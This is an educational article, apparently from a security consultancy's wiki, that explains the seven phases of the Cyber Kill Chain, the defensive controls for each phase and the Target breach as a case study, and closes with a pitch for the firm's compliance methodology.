Kill Chain Model: Understanding Attack Progression
How Lockheed Martin's Cyber Kill Chain maps the stages of an intrusion, and how defenders can disrupt attacks at each phase.
Continue your mission
How Lockheed Martin's Cyber Kill Chain maps the stages of an intrusion, and how defenders can disrupt attacks at each phase.
# Kill Chain Model: Understanding Attack Progression
The Cyber Kill Chain, developed by Lockheed Martin in 2011, is a structured framework that maps the sequential stages an adversary must complete to execute a successful intrusion. It exists because defenders needed a common operational vocabulary to describe, detect, and interrupt attacks before they reached their objectives. The core insight is simple but powerful: every targeted intrusion follows a predictable sequence of steps, and disrupting any one of those steps defeats the attack. By understanding this progression, security teams shift from reactive incident response toward proactive defense, investing controls at the points where interruption is most cost-effective for the defender and most damaging to the attacker.
---
The Cyber Kill Chain is a seven-phase model that describes intrusion progression from initial reconnaissance through final data exfiltration or mission completion. The seven phases are: Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control (C2), and Actions on Objectives. Each phase represents a discrete attacker activity, and each represents a corresponding defensive opportunity.
The Kill Chain is not a risk scoring system, a vulnerability database, or a compliance checklist. It is a causal model of attack behavior. Understanding this distinction matters because practitioners sometimes confuse it with MITRE ATT&CK, which catalogs specific adversary techniques at a granular level. The Kill Chain operates at a higher abstraction layer: it describes the "what happens and in what order," while ATT&CK describes the "how, specifically." The two frameworks are complementary, not competing.
The model also has notable variants. The Unified Kill Chain, developed by Paul Pols in 2017, extends the original seven phases to eighteen, incorporating post-exploitation activities and lateral movement in greater detail. The MITRE ATT&CK framework itself can be mapped onto Kill Chain phases but provides far more technical specificity. Some organizations adopt an internal hybrid, using Kill Chain phases as a detection classification scheme while mapping ATT&CK techniques beneath each phase.
The Kill Chain does not apply equally to all threat categories. It was designed with advanced persistent threats and targeted intrusions in mind. It is less descriptive for insider threats, where the attacker already has internal access and skips early phases entirely, and for opportunistic commodity attacks, where weaponization and delivery may be nearly simultaneous through automated exploit kits. Practitioners should account for these boundaries when building detection models around the framework.
---
The Kill Chain operates as a sequential model. An attacker must complete each phase to progress to the next, which means defenders have multiple independent opportunities to detect and interrupt the attack chain.
Phase 1: Reconnaissance The adversary collects information about the target before any offensive action. This includes open-source intelligence gathering (OSINT), scanning public IP ranges, scraping employee data from LinkedIn, reviewing job postings for technology stack clues, and identifying email formats. Spear-phishing campaigns begin here. Defensive countermeasures include monitoring for unusual scanning activity against public-facing assets, limiting public disclosure of internal technology details in job postings, and conducting your own OSINT audits to understand what an attacker would see before they act.
Phase 2: Weaponization The attacker pairs a payload (malware, exploit code) with a delivery mechanism (a malicious document, a staged link). This phase happens entirely off-network from the defender's perspective, making it the hardest phase to directly detect. However, threat intelligence feeds that track attacker infrastructure and malware families provide indirect visibility. Malware analysis of previously seen samples can reveal weaponization patterns associated with specific threat actors.
Phase 3: Delivery The weapon is transmitted to the target environment. Common delivery vectors include phishing emails with malicious attachments, drive-by download sites, malicious USB media, and compromised third-party software updates (as seen in supply chain attacks). Defensive focus here includes email filtering, web proxies, endpoint protection, and user awareness training. This is one of the highest-return phases for defensive investment because many attacks can be stopped before any code executes.
Phase 4: Exploitation The delivered payload executes and exploits a vulnerability in software, configuration, or user behavior. This may involve a software vulnerability (a known CVE in an unpatched application), a zero-day, or simply a user opening a malicious document that runs a macro. Defenses include patch management, application whitelisting, disabling macro execution in Office documents by policy, and deploying endpoint detection and response (EDR) tools capable of detecting exploit behavior in memory.
Phase 5: Installation The attacker establishes persistence on the compromised system. This may involve dropping a remote access trojan (RAT), creating a scheduled task, modifying the registry for auto-run persistence, or installing a web shell on a compromised server. Detection here relies on monitoring for anomalous process creation, unauthorized changes to startup locations, and unexpected new files in system directories. EDR telemetry and a tuned SIEM are essential.
Phase 6: Command and Control (C2) The malware establishes an outbound communication channel to attacker-controlled infrastructure. This allows the adversary to issue commands, receive stolen data, and pivot further. C2 channels often use encrypted HTTPS traffic, domain generation algorithms (DGAs) to evade domain blacklisting, or DNS tunneling to blend into normal traffic. Defensive controls include DNS filtering, network traffic analysis for anomalous beacon patterns, and egress filtering to block unexpected outbound connections.
Phase 7: Actions on Objectives The attacker completes their mission: exfiltrating sensitive data, deploying ransomware, destroying data, establishing a persistent foothold for future operations, or pivoting to adjacent networks. This is the phase defenders most want to prevent, but if earlier phases were not interrupted, detection and response here is still possible. Data loss prevention (DLP) tools, user behavior analytics (UBA), and network segmentation all contribute to limiting impact at this stage.
Concrete Scenario: Spear-Phishing to Ransomware A threat actor targets a regional healthcare system. During Reconnaissance, they identify the CFO's email from a press release and confirm the organization uses Microsoft 365 from a job posting. During Weaponization, they craft a malicious Excel document with an embedded macro that downloads a Cobalt Strike beacon. During Delivery, the CFO receives a phishing email appearing to come from an auditing firm. During Exploitation, the CFO enables macros. During Installation, Cobalt Strike establishes persistence via a scheduled task. During C2, the beacon checks in to a domain registered three days prior. During Actions on Objectives, the actor deploys ransomware across file shares after spending two weeks in lateral movement. Each phase offered a defensive window: the phishing email could have been filtered, macro execution could have been blocked by policy, the scheduled task could have triggered an alert, the beacon pattern could have been flagged by DNS analytics. This is the operational value of the Kill Chain model: it reveals exactly where the defense failed and where it can be strengthened.
---
The Kill Chain matters because it converts abstract threat narratives into actionable defensive architecture. Without a model for attack progression, security teams tend to invest reactively, buying tools that address recent incidents rather than building layered defenses that address the full attack surface across all intrusion phases. The result is predictable: sophisticated attackers find the unmonitored phase and exploit it consistently.
Organizations without a Kill Chain-informed defensive posture frequently discover they have excellent email filtering (addressing Delivery) but no DNS monitoring (leaving C2 unchecked) and no network segmentation (making Actions on Objectives catastrophically effective). The Kill Chain exposes these coverage gaps structurally, not anecdotally.
A documented consequence: The 2013 Target data breach is one of the most cited examples of Kill Chain failure at multiple phases. Attackers gained initial access through a third-party HVAC vendor's credentials (Delivery and Exploitation), installed malware on point-of-sale systems (Installation), maintained C2 communication that generated alerts in Target's security tools (C2 phase alerts were observed but not acted upon), and exfiltrated over 40 million credit card records (Actions on Objectives). Post-breach analysis showed that the attack could have been stopped at the C2 phase: Target's FireEye system generated alerts that security staff did not escalate. A Kill Chain framework would have made the criticality of C2 detection explicit and established escalation protocols around it.
Common misconceptions to address: First, many practitioners assume the Kill Chain is linear and that attackers always proceed in strict sequence. Modern adversaries iterate, re-enter earlier phases, and run parallel operations. The model is a conceptual guide, not a rigid script. Second, some believe that stopping an attack at a late phase (such as Installation) represents a failure of defense. In practice, defense-in-depth means expecting that some attacks will penetrate early layers and ensuring late-phase detection is equally mature. Third, the Kill Chain does not imply that defenders must detect every phase in real time. Retrospective analysis of logs through the Kill Chain lens is equally valid and often reveals past intrusions that triggered no real-time alerts.
---
CDA approaches the Kill Chain model through the Planetary Defense Model (PDM) under the Risk Governance and Architecture (RGA) domain. In the RGA domain, the Kill Chain is not treated as a theoretical teaching tool but as a practical architecture guide for control placement, gap analysis, and continuous monitoring program design.
The Perpetual Compliance Assurance (PCA) methodology that CDA applies to client engagements is directly relevant here. Compliance is not an event. It is a state. For Kill Chain-informed programs, this means that control coverage across all seven phases must be continuously validated, not assessed once during an annual audit and assumed stable thereafter. Threat actor behavior evolves, new delivery vectors emerge, and C2 infrastructure rotates constantly. A control that was effective against a known threat actor's C2 infrastructure six months ago may be ineffective today if that actor has migrated to new domains or changed beacon intervals.
CDA's operational approach under PCA for Kill Chain alignment includes three specific practices that distinguish it from standard advisory engagements. First, CDA maps existing client controls to Kill Chain phases explicitly, producing a phase-by-phase coverage heatmap that shows where detection capability is strong, where it is absent, and where it depends on a single control with no redundancy. Second, CDA conducts Kill Chain simulation exercises (distinct from traditional penetration testing) that test defender detection and response at each individual phase rather than measuring only whether an attacker achieves final objectives. This reveals whether Phase 5 installation events trigger alerts, whether Phase 6 C2 beacons are flagged by DNS analytics, and whether Phase 7 data movement triggers DLP policies. Third, CDA integrates Kill Chain coverage metrics into the client's continuous compliance reporting, so that control degradation (a lapsed DNS filter subscription, an EDR agent gap on new endpoints) surfaces as a compliance variance, not merely a technical gap.
This approach operationalizes the Kill Chain rather than treating it as a one-time maturity assessment. For RGA domain clients, Kill Chain alignment becomes a measurable, auditable attribute of the organization's security posture rather than a framework that sits in a document and guides no operational decision.
---
---
---
CDA Theater missions that address topics covered in this article.
COBIT 2019 is ISACA's IT governance framework with 40 objectives across five domains, featuring a flexible design factor system that aligns IT strategy with business goals and maps to standards like NIST CSF and ISO 27001.
CMMC 2.0 requires defense contractors to demonstrate cybersecurity maturity at three levels.
HITRUST CSF harmonizes multiple frameworks into one certifiable standard for healthcare.
Written by CDA Wiki Team
Found an issue? Help improve this article.